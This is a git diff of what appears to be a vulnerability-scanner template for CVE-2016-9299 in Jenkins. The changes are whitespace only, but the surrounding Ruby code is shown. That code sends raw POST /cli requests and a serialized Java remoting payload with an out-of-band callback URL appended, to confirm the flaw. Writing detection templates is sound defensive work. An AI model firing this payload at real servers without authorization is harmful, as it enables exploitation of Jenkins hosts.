diff --git a/http/cves/2024/CVE-2016-9299.yaml b/http/cves/2024/CVE-2016-9299.yaml
index 4006a88a6b..77909ee9e9 100644
--- a/http/cves/2024/CVE-2016-9299.yaml
+++ b/http/cves/2024/CVE-2016-9299.yaml
@@ -33,9 +33,9 @@ code:
 require 'base64'
 # Define environment variables for host details (make sure they are properly set in your environment)
- $Hostname = ENV['Hostname']
- $Host = ENV['Host']
- $Port = ENV['Port']
+ $Hostname = ENV['Hostname']
+ $Host = ENV['Host']
+ $Port = ENV['Port']
 interactsh = (ENV['oast']).ljust(45,'/')
 url_dns = "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"
 $decoded_url_dns = [url_dns].pack("H*")
@@ -44,7 +44,7 @@ code:
 # Step 1: Send the download request without waiting for a response or closing the socket
 def send_download_request(host, port)
 download_socket = TCPSocket.new(host, port)
-
+
 download_request = <<~REQ
 POST /cli HTTP/1.1
 Host: #{$Hostname}
@@ -53,7 +53,7 @@ code:
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 0\r\n
 REQ
-
+
 #puts "Sending Download Request..."
 download_socket.write(download_request)
@@ -64,7 +64,7 @@ code:
 # Step 2: Send the upload request
 def send_upload_request(host, port)
 socket = TCPSocket.new(host, port)
-
+
 # Base64 decoded payload for upload request
 chunked_payload = "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\x00\x00\x00\x00\x01\x55" + $decoded_url_dns
@@ -79,7 +79,7 @@ code:
 #puts "Sending Upload Request..."
 socket.write(upload_request)
-
+
 # Send the binary data (payload)
 socket.write(chunked_payload)